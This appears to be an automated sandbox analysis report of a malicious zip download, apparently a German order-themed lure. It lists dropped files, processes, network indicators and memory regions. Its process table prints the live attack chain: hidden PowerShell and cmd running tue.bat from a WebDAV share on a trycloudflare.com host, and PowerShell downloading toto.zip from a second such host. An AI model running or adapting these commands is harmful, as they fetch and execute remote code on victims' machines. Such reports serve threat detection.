Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\Downloads\BestellungVRG020002.zip (copy)
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
 |
|
|
C:\Users\user\Downloads\toto.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 11
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5788
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 23
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4f600.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka0uob4e.cto.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmadkynu.1ms.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2eu0te0.vxu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzzfzdv0.0nx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 04-17-18-363.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\03cadd97-da11-48f9-a9e0-e4ea0ea14d23.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\7e8a73e8-c68e-4dee-bba4-7d718f4cc8f5.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\b72b951e-990d-45c7-9fa0-88d4c9dcbde5.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\ff734dff-738b-4434-b791-19956e0299ef.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\Downloads\50e90ad8-c7e3-4c84-813c-786d849f4ee1.tmp
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
|
C:\Users\user\Downloads\BestellungVRG020002.zip.crdownload (copy)
|
Zip archive data, at least v1.0 to extract, compression method=store
|
dropped
|
||
|
Chrome Cache Entry: 180
|
Zip archive data, at least v1.0 to extract, compression method=store
|
downloaded
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 51 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0"
|
|
|
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat'
analyze"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat'
analyze"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch
{ exit 1 }"
|
|
|
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276
--field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
|
|
||
|
https://retailer-indicators-resume-key.trycloudfla
|
unknown
|
|
|
|
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
|
104.16.230.132
|
|
|
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
|
104.16.230.132
|
|
|
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
|
104.16.231.132
|
|
|
|
https://retailer-indicators-resume-key.trycloudflare.com
|
unknown
|
|
|
|
https://theme-crack-emissions-perspectives.trycloudflare.com/
|
unknown
|
|
|
|
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat4
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
|
162.125.66.15
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/C:
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkC:
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batC:
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnks=C:
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip&
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/OT
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip;
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkL
|
unknown
|
||
|
http://retailer-indicators-resume-key.trycloudflare.com
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkrw
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkq
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/#
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipWindows##
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipO
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk:
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipxit
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/ll
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISION
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/55theme-crack-emissions-perspectives.tr
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISIONJ
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipX
|
unknown
|
||
|
https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batq
|
unknown
|
There are 32 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
retailer-indicators-resume-key.trycloudflare.com
|
104.16.231.132
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
edge-block-www-env.dropbox-dns.com
|
162.125.66.15
|
||
|
www.google.com
|
142.250.185.228
|
||
|
x1.i.lencr.org
|
unknown
|
||
|
dl.dropboxusercontent.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.17
|
unknown
|
unknown
|
|
|
|
104.16.231.132
|
retailer-indicators-resume-key.trycloudflare.com
|
United States
|
|
|
|
142.250.185.228
|
www.google.com
|
United States
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
162.125.66.15
|
edge-block-www-env.dropbox-dns.com
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
96.7.168.138
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
13E37899000
|
trusted library allocation
|
page read and write
|
||
|
13E383EF000
|
trusted library allocation
|
page read and write
|
||
|
13E4ED50000
|
heap
|
page read and write
|
||
|
13E3830C000
|
trusted library allocation
|
page read and write
|
||
|
13E3825C000
|
trusted library allocation
|
page read and write
|
||
|
13E384E1000
|
trusted library allocation
|
page read and write
|
||
|
13E3872E000
|
trusted library allocation
|
page read and write
|
||
|
13E38847000
|
trusted library allocation
|
page read and write
|
||
|
13E38740000
|
trusted library allocation
|
page read and write
|
||
|
13E3883E000
|
trusted library allocation
|
page read and write
|
||
|
13E37389000
|
trusted library allocation
|
page read and write
|
||
|
AD0627E000
|
stack
|
page read and write
|
||
|
13E38D85000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFAF0000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FB30000
|
heap
|
page read and write
|
||
|
13E34C30000
|
heap
|
page readonly
|
||
|
13E38AB5000
|
trusted library allocation
|
page read and write
|
||
|
13E37887000
|
trusted library allocation
|
page read and write
|
||
|
13E38A7C000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBC1000
|
heap
|
page read and write
|
||
|
13E38327000
|
trusted library allocation
|
page read and write
|
||
|
13E38612000
|
trusted library allocation
|
page read and write
|
||
|
13E38D8E000
|
trusted library allocation
|
page read and write
|
||
|
13E38C5A000
|
trusted library allocation
|
page read and write
|
||
|
25D62B1B000
|
heap
|
page read and write
|
||
|
41F07FD000
|
stack
|
page read and write
|
||
|
13E3884A000
|
trusted library allocation
|
page read and write
|
||
|
41F033E000
|
stack
|
page read and write
|
||
|
6FFB78C000
|
stack
|
page read and write
|
||
|
AD060FE000
|
stack
|
page read and write
|
||
|
13E4F84E000
|
heap
|
page read and write
|
||
|
13E37529000
|
trusted library allocation
|
page read and write
|
||
|
13E365D7000
|
heap
|
page execute and read and write
|
||
|
41F08FE000
|
stack
|
page read and write
|
||
|
7FF9BFE83000
|
trusted library allocation
|
page read and write
|
||
|
13E37574000
|
trusted library allocation
|
page read and write
|
||
|
13E37541000
|
trusted library allocation
|
page read and write
|
||
|
13E38969000
|
trusted library allocation
|
page read and write
|
||
|
13E38B5C000
|
trusted library allocation
|
page read and write
|
||
|
13E34CD4000
|
heap
|
page read and write
|
||
|
13E46D58000
|
trusted library allocation
|
page read and write
|
||
|
20B53778000
|
heap
|
page read and write
|
||
|
13E38C87000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBC5000
|
heap
|
page read and write
|
||
|
13E378E1000
|
trusted library allocation
|
page read and write
|
||
|
13E34B50000
|
heap
|
page read and write
|
||
|
1EC8FB50000
|
heap
|
page read and write
|
||
|
13E38621000
|
trusted library allocation
|
page read and write
|
||
|
13E3753E000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFBD0000
|
trusted library allocation
|
page read and write
|
||
|
13E378D5000
|
trusted library allocation
|
page read and write
|
||
|
41F02B8000
|
stack
|
page read and write
|
||
|
13E37395000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF52D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9BF9C0000
|
trusted library allocation
|
page read and write
|
||
|
13E383F2000
|
trusted library allocation
|
page read and write
|
||
|
13E38B71000
|
trusted library allocation
|
page read and write
|
||
|
13E38AB2000
|
trusted library allocation
|
page read and write
|
||
|
13E3832A000
|
trusted library allocation
|
page read and write
|
||
|
13E36A12000
|
heap
|
page read and write
|
||
|
7FF9BFDC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9BF73B000
|
trusted library allocation
|
page read and write
|
||
|
13E38889000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF830000
|
trusted library allocation
|
page read and write
|
||
|
41F067E000
|
stack
|
page read and write
|
||
|
13E38719000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC50000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF523000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9BFD70000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7C0000
|
trusted library allocation
|
page read and write
|
||
|
20B53960000
|
heap
|
page read and write
|
||
|
13E38978000
|
trusted library allocation
|
page read and write
|
||
|
13E38C54000
|
trusted library allocation
|
page read and write
|
||
|
13E3756E000
|
trusted library allocation
|
page read and write
|
||
|
13E38259000
|
trusted library allocation
|
page read and write
|
||
|
13E38999000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFB90000
|
trusted library allocation
|
page read and write
|
||
|
20686710000
|
heap
|
page read and write
|
||
|
AD061FE000
|
stack
|
page read and write
|
||
|
13E3851A000
|
trusted library allocation
|
page read and write
|
||
|
20686810000
|
heap
|
page read and write
|
||
|
13E38618000
|
trusted library allocation
|
page read and write
|
||
|
AB3057D000
|
stack
|
page read and write
|
||
|
13E366C4000
|
heap
|
page read and write
|
||
|
13E38975000
|
trusted library allocation
|
page read and write
|
||
|
13E38C78000
|
trusted library allocation
|
page read and write
|
||
|
13E3736E000
|
trusted library allocation
|
page read and write
|
||
|
13E3897E000
|
trusted library allocation
|
page read and write
|
||
|
13E3861E000
|
trusted library allocation
|
page read and write
|
||
|
13E38B68000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE6D000
|
trusted library allocation
|
page read and write
|
||
|
13E38874000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7B5000
|
trusted library allocation
|
page read and write
|
||
|
18BBB817000
|
heap
|
page read and write
|
||
|
13E3882F000
|
trusted library allocation
|
page read and write
|
||
|
13E36563000
|
trusted library allocation
|
page read and write
|
||
|
13E38C6C000
|
trusted library allocation
|
page read and write
|
||
|
13E37720000
|
trusted library allocation
|
page read and write
|
||
|
25D62B0E000
|
heap
|
page read and write
|
||
|
7FF9BFA90000
|
trusted library allocation
|
page read and write
|
||
|
13E36B90000
|
heap
|
page execute and read and write
|
||
|
18BBB780000
|
heap
|
page read and write
|
||
|
13E36520000
|
trusted library allocation
|
page read and write
|
||
|
13E38D70000
|
trusted library allocation
|
page read and write
|
||
|
13E38508000
|
trusted library allocation
|
page read and write
|
||
|
25D62B26000
|
heap
|
page read and write
|
||
|
223E3B60000
|
heap
|
page read and write
|
||
|
13E38505000
|
trusted library allocation
|
page read and write
|
||
|
13E3888C000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF840000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B59FE000
|
stack
|
page read and write
|
||
|
7FF9BF7E0000
|
trusted library allocation
|
page read and write
|
||
|
13E38615000
|
trusted library allocation
|
page read and write
|
||
|
7B6D8A000
|
stack
|
page read and write
|
||
|
20686480000
|
heap
|
page read and write
|
||
|
7FF9BF950000
|
